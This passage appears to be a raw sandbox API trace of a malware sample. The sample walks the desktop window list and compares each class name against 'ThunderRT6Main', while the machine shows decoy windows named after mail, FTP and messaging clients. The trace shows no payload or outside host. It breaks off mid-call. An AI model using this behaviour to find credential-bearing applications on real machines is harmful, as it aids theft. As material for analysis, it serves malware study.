[0218.282] GetClassNameA (in: hWnd=0x10202, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="whatsappwnd") returned 11 [0218.282] lstrcmpA (lpString1="whatsappwnd", lpString2="ThunderRT6Main") returned 1 [0218.283] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x984 [0218.283] GetWindow (hWnd=0x10202, uCmd=0x2) returned 0x10204 [0218.283] GetClassNameA (in: hWnd=0x10204, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.283] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.283] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x984 [0218.283] GetWindow (hWnd=0x10204, uCmd=0x2) returned 0x101fe [0218.283] GetClassNameA (in: hWnd=0x101fe, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="webdrivecls") returned 11 [0218.283] lstrcmpA (lpString1="webdrivecls", lpString2="ThunderRT6Main") returned 1 [0218.283] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x974 [0218.283] GetWindow (hWnd=0x101fe, uCmd=0x2) returned 0x10200 [0218.283] GetClassNameA (in: hWnd=0x10200, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.283] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.283] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x974 [0218.283] GetWindow (hWnd=0x10200, uCmd=0x2) returned 0x101fa [0218.283] GetClassNameA (in: hWnd=0x101fa, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="trillianwnd") returned 11 [0218.283] lstrcmpA (lpString1="trillianwnd", lpString2="ThunderRT6Main") returned 1 [0218.283] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x964 [0218.283] GetWindow (hWnd=0x101fa, uCmd=0x2) returned 0x101fc [0218.283] GetClassNameA (in: hWnd=0x101fc, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.283] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.283] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x964 [0218.283] GetWindow (hWnd=0x101fc, uCmd=0x2) returned 0x101f6 [0218.283] GetClassNameA (in: hWnd=0x101f6, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="totalcmdwindow") returned 14 [0218.283] lstrcmpA (lpString1="totalcmdwindow", lpString2="ThunderRT6Main") returned 1 [0218.284] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x954 [0218.284] GetWindow (hWnd=0x101f6, uCmd=0x2) returned 0x101f8 [0218.284] GetClassNameA (in: hWnd=0x101f8, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.284] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.284] GetWindowThreadProcessId (in: hWnd=0x101f8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x954 [0218.284] GetWindow (hWnd=0x101f8, uCmd=0x2) returned 0x101f2 [0218.284] GetClassNameA (in: hWnd=0x101f2, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="thunderbirdwnd") returned 14 [0218.284] lstrcmpA (lpString1="thunderbirdwnd", lpString2="ThunderRT6Main") returned -1 [0218.284] GetWindowThreadProcessId (in: hWnd=0x101f2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x944 [0218.284] GetWindow (hWnd=0x101f2, uCmd=0x2) returned 0x101f4 [0218.284] GetClassNameA (in: hWnd=0x101f4, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.284] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.284] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x944 [0218.284] GetWindow (hWnd=0x101f4, uCmd=0x2) returned 0x101ee [0218.284] GetClassNameA (in: hWnd=0x101ee, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="smartftpwindow") returned 14 [0218.284] lstrcmpA (lpString1="smartftpwindow", lpString2="ThunderRT6Main") returned -1 [0218.284] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x934 [0218.284] GetWindow (hWnd=0x101ee, uCmd=0x2) returned 0x101f0 [0218.284] GetClassNameA (in: hWnd=0x101f0, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.284] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.284] GetWindowThreadProcessId (in: hWnd=0x101f0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x934 [0218.284] GetWindow (hWnd=0x101f0, uCmd=0x2) returned 0x101ea [0218.284] GetClassNameA (in: hWnd=0x101ea, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="skype_window") returned 12 [0218.285] lstrcmpA (lpString1="skype_window", lpString2="ThunderRT6Main") returned -1 [0218.285] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x924 [0218.285] GetWindow (hWnd=0x101ea, uCmd=0x2) returned 0x101ec [0218.285] GetClassNameA (in: hWnd=0x101ec, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.285] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.285] GetWindowThreadProcessId (in: hWnd=0x101ec, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x924 [0218.285] GetWindow (hWnd=0x101ec, uCmd=0x2) returned 0x101e6 [0218.285] GetClassNameA (in: hWnd=0x101e6, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="scriptftp_win") returned 13 [0218.285] lstrcmpA (lpString1="scriptftp_win", lpString2="ThunderRT6Main") returned -1 [0218.285] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x914 [0218.285] GetWindow (hWnd=0x101e6, uCmd=0x2) returned 0x101e8 [0218.285] GetClassNameA (in: hWnd=0x101e8, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.285] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.285] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x914 [0218.285] GetWindow (hWnd=0x101e8, uCmd=0x2) returned 0x101e2 [0218.285] GetClassNameA (in: hWnd=0x101e2, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="pidgin_wnd") returned 10 [0218.285] lstrcmpA (lpString1="pidgin_wnd", lpString2="ThunderRT6Main") returned -1 [0218.285] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x904 [0218.285] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101e4 [0218.285] GetClassNameA (in: hWnd=0x101e4, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.285] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.285] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x904 [0218.285] GetWindow (hWnd=0x101e4, uCmd=0x2) returned 0x101de [0218.285] GetClassNameA (in: hWnd=0x101de, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="outlook_class") returned 13 [0218.285] lstrcmpA (lpString1="outlook_class", lpString2="ThunderRT6Main") returned -1 [0218.285] GetWindowThreadProcessId (in: hWnd=0x101de, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8f4 [0218.286] GetWindow (hWnd=0x101de, uCmd=0x2) returned 0x101e0 [0218.286] GetClassNameA (in: hWnd=0x101e0, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.286] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.286] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8f4 [0218.286] GetWindow (hWnd=0x101e0, uCmd=0x2) returned 0x101da [0218.286] GetClassNameA (in: hWnd=0x101da, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="operamail") returned 9 [0218.286] lstrcmpA (lpString1="operamail", lpString2="ThunderRT6Main") returned -1 [0218.286] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8e4 [0218.286] GetWindow (hWnd=0x101da, uCmd=0x2) returned 0x101dc [0218.286] GetClassNameA (in: hWnd=0x101dc, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.286] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.286] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8e4 [0218.286] GetWindow (hWnd=0x101dc, uCmd=0x2) returned 0x101d6 [0218.286] GetClassNameA (in: hWnd=0x101d6, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="notepadwnd") returned 10 [0218.286] lstrcmpA (lpString1="notepadwnd", lpString2="ThunderRT6Main") returned -1 [0218.286] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8d4 [0218.286] GetWindow (hWnd=0x101d6, uCmd=0x2) returned 0x101d8 [0218.286] GetClassNameA (in: hWnd=0x101d8, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.286] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.286] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8d4 [0218.286] GetWindow (hWnd=0x101d8, uCmd=0x2) returned 0x101d2 [0218.286] GetClassNameA (in: hWnd=0x101d2, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="ncftp_win") returned 9 [0218.286] lstrcmpA (lpString1="ncftp_win", lpString2="ThunderRT6Main") returned -1 [0218.286] GetWindowThreadProcessId (in: hWnd=0x101d2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8c4 [0218.287] GetWindow (hWnd=0x101d2, uCmd=0x2) returned 0x101d4 [0218.287] GetClassNameA (in: hWnd=0x101d4, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.287] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.287] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8c4 [0218.287] GetWindow (hWnd=0x101d4, uCmd=0x2) returned 0x101ce [0218.287] GetClassNameA (in: hWnd=0x101ce, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="leechftp_wnd") returned 12 [0218.287] lstrcmpA (lpString1="leechftp_wnd", lpString2="ThunderRT6Main") returned -1 [0218.287] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8b4 [0218.287] GetWindow (hWnd=0x101ce, uCmd=0x2) returned 0x101d0 [0218.287] GetClassNameA (in: hWnd=0x101d0, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.287] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.287] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8b4 [0218.287] GetWindow (hWnd=0x101d0, uCmd=0x2) returned 0x101ca [0218.287] GetClassNameA (in: hWnd=0x101ca, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="icq_cls") returned 7 [0218.287] lstrcmpA (lpString1="icq_cls", lpString2="ThunderRT6Main") returned -1 [0218.287] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8a4 [0218.287] GetWindow (hWnd=0x101ca, uCmd=0x2) returned 0x101cc [0218.287] GetClassNameA (in: hWnd=0x101cc, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.287] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.287] GetWindowThreadProcessId (in: hWnd=0x101cc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8a4 [0218.287] GetWindow (hWnd=0x101cc, uCmd=0x2) returned 0x101c6 [0218.287] GetClassNameA (in: hWnd=0x101c6, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="gmailnotifierprocls") returned 19 [0218.287] lstrcmpA (lpString1="gmailnotifierprocls", lpString2="ThunderRT6Main") returned -1 [0218.287] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x894 [0218.287] GetWindow (hWnd=0x101c6, uCmd=0x2) returned 0x101c8 [0218.288] GetClassNameA (in: hWnd=0x101c8, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.288] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.288] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x894 [0218.288] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x101c2 [0218.288] GetClassNameA (in: hWnd=0x101c2, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="foxmailincmailapp") returned 17 [0218.288] lstrcmpA (lpString1="foxmailincmailapp", lpString2="ThunderRT6Main") returned -1 [0218.288] GetWindowThreadProcessId (in: hWnd=0x101c2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x884 [0218.288] GetWindow (hWnd=0x101c2, uCmd=0x2) returned 0x101c4 [0218.288] GetClassNameA (in: hWnd=0x101c4, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.288] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.288] GetWindowThreadProcessId (in: hWnd=0x101c4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x884 [0218.288] GetWindow (hWnd=0x101c4, uCmd=0x2) returned 0x101be [0218.288] GetClassNameA (in: hWnd=0x101be, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="flingclass") returned 10 [0218.288] lstrcmpA (lpString1="flingclass", lpString2="ThunderRT6Main") returned -1 [0218.288] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x874 [0218.288] GetWindow (hWnd=0x101be, uCmd=0x2) returned 0x101c0 [0218.288] GetClassNameA (in: hWnd=0x101c0, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.288] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.288] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x874 [0218.289] GetWindow (hWnd=0x101c0, uCmd=0x2) returned 0x101ba [0218.289] GetClassNameA (in: hWnd=0x101ba, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="flashfxpcls") returned 11 [0218.290] lstrcmpA (lpString1="flashfxpcls", lpString2="ThunderRT6Main") returned -1 [0218.290] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x864 [0218.290] GetWindow (hWnd=0x101ba, uCmd=0x2) returned 0x101bc [0218.291] GetClassNameA (in: hWnd=0x101bc, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.291] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.291] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x864 [0218.291] GetWindow (hWnd=0x101bc, uCmd=0x2) returned 0x101b6 [0218.291] GetClassNameA (in: hWnd=0x101b6, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="filezillaapp") returned 12 [0218.291] lstrcmpA (lpString1="filezillaapp", lpString2="ThunderRT6Main") returned -1 [0218.291] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x854 [0218.291] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101b8 [0218.291] GetClassNameA (in: hWnd=0x101b8, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.291] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.291] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x854 [0218.291] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101b2 [0218.291] GetClassNameA (in: hWnd=0x101b2, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="farwin") returned 6 [0218.291] lstrcmpA (lpString1="farwin", lpString2="ThunderRT6Main") returned -1 [0218.291] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x844 [0218.291] GetWindow (hWnd=0x101b2, uCmd=0x2) returned 0x101b4 [0218.291] GetClassNameA (in: hWnd=0x101b4, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.291] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.291] GetWindowThreadProcessId (in: hWnd=0x101b4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x844 [0218.291] GetWindow (hWnd=0x101b4, uCmd=0x2) returned 0x101ae [0218.291] GetClassNameA (in: hWnd=0x101ae, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="coreftp_win") returned 11 [0218.291] lstrcmpA (lpString1="coreftp_win", lpString2="ThunderRT6Main") returned -1 [0218.291] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x834 [0218.291] GetWindow (hWnd=0x101ae, uCmd=0x2) returned 0x101b0 [0218.291] GetClassNameA (in: hWnd=0x101b0, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.292] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.292] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x834 [0218.292] GetWindow (hWnd=0x101b0, uCmd=0x2) returned 0x101aa [0218.292] GetClassNameA (in: hWnd=0x101aa, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="bitkinex_cls") returned 12 [0218.292] lstrcmpA (lpString1="bitkinex_cls", lpString2="ThunderRT6Main") returned -1 [0218.292] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x824 [0218.292] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x101ac [0218.292] GetClassNameA (in: hWnd=0x101ac, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.292] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.292] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x824 [0218.292] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x101a6 [0218.292] GetClassNameA (in: hWnd=0x101a6, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="barca_") returned 6 [0218.292] lstrcmpA (lpString1="barca_", lpString2="ThunderRT6Main") returned -1 [0218.292] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x814 [0218.292] GetWindow (hWnd=0x101a6, uCmd=0x2) returned 0x101a8 [0218.292] GetClassNameA (in: hWnd=0x101a8, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.292] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.292] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x814 [0218.292] GetWindow (hWnd=0x101a8, uCmd=0x2) returned 0x101a2 [0218.292] GetClassNameA (in: hWnd=0x101a2, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="alftpwin") returned 8 [0218.292] lstrcmpA (lpString1="alftpwin", lpString2="ThunderRT6Main") returned -1 [0218.292] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x804 [0218.292] GetWindow (hWnd=0x101a2, uCmd=0x2) returned 0x101a4 [0218.292] GetClassNameA (in: hWnd=0x101a4, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.292] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.292] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x804 [0218.293] GetWindow (hWnd=0x101a4, uCmd=0x2) returned 0x1019e [0218.293] GetClassNameA (in: hWnd=0x1019e, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="absolutetelnet_window") returned 21 [0218.293] lstrcmpA (lpString1="absolutetelnet_window", lpString2="ThunderRT6Main") returned -1 [0218.293] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7bc [0218.293] GetWindow (hWnd=0x1019e, uCmd=0x2) returned 0x101a0 [0218.293] GetClassNameA (in: hWnd=0x101a0, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.293] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.293] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7bc [0218.293] GetWindow (hWnd=0x101a0, uCmd=0x2) returned 0x1019a [0218.293] GetClassNameA (in: hWnd=0x1019a, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="3dftp") returned 5 [0218.293] lstrcmpA (lpString1="3dftp", lpString2="ThunderRT6Main") returned -1 [0218.293] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1c4 [0218.293] GetWindow (hWnd=0x1019a, uCmd=0x2) returned 0x1019c [0218.293] GetClassNameA (in: hWnd=0x1019c, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.293] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.293] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1c4 [0218.293] GetWindow (hWnd=0x1019c, uCmd=0x2) returned 0x10196 [0218.293] GetClassNameA (in: hWnd=0x10196, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="alice_class") returned 11 [0218.293] lstrcmpA (lpString1="alice_class", lpString2="ThunderRT6Main") returned -1 [0218.293] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x2a8 [0218.293] GetWindow (hWnd=0x10196, uCmd=0x2) returned 0x10198 [0218.293] GetClassNameA (in: hWnd=0x10198, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.293] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.293] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x2a8 [0218.293] GetWindow (hWnd=0x10198, uCmd=0x2) returned 0x10192 [0218.293] GetClassNameA (in: hWnd=0x10192, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="piano_app") returned 9 [0218.293] lstrcmpA (lpString1="piano_app", lpString2="ThunderRT6Main") returned -1 [0218.294] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xc0 [0218.294] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10194 [0218.294] GetClassNameA (in: hWnd=0x10194, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.294] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.294] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xc0 [0218.294] GetWindow (hWnd=0x10194, uCmd=0x2) returned 0x1018e [0218.294] GetClassNameA (in: hWnd=0x1018e, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="TurnerGoessavingcls") returned 19 [0218.294] lstrcmpA (lpString1="TurnerGoessavingcls", lpString2="ThunderRT6Main") returned 1 [0218.294] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x5f8 [0218.294] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x10190 [0218.294] GetClassNameA (in: hWnd=0x10190, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.294] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.294] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x5f8 [0218.294] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018a [0218.294] GetClassNameA (in: hWnd=0x1018a, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="yaSubstantiallyapp") returned 18 [0218.294] lstrcmpA (lpString1="yaSubstantiallyapp", lpString2="ThunderRT6Main") returned 1 [0218.294] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x5b0 [0218.294] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x1018c [0218.294] GetClassNameA (in: hWnd=0x1018c, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.294] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.294] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x5b0 [0218.294] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x10186 [0218.294] GetClassNameA (in: hWnd=0x10186, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="pentiumcls") returned 10 [0218.294] lstrcmpA (lpString1="pentiumcls", lpString2="ThunderRT6Main") returned -1 [0218.294] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x3f0 [0218.294] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10188 [0218.294] GetClassNameA (in: hWnd=0x10188, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.294] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.295] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x3f0 [0218.295] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10182 [0218.295] GetClassNameA (in: hWnd=0x10182, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="seating_cls") returned 11 [0218.295] lstrcmpA (lpString1="seating_cls", lpString2="ThunderRT6Main") returned -1 [0218.295] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x558 [0218.295] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x10184 [0218.295] GetClassNameA (in: hWnd=0x10184, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.295] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.295] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x558 [0218.295] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x1017e [0218.295] GetClassNameA (in: hWnd=0x1017e, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="Horse_") returned 6 [0218.295] lstrcmpA (lpString1="Horse_", lpString2="ThunderRT6Main") returned -1 [0218.295] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x5f0 [0218.295] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10180 [0218.295] GetClassNameA (in: hWnd=0x10180, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.295] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.295] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x5f0 [0218.295] GetWindow (hWnd=0x10180, 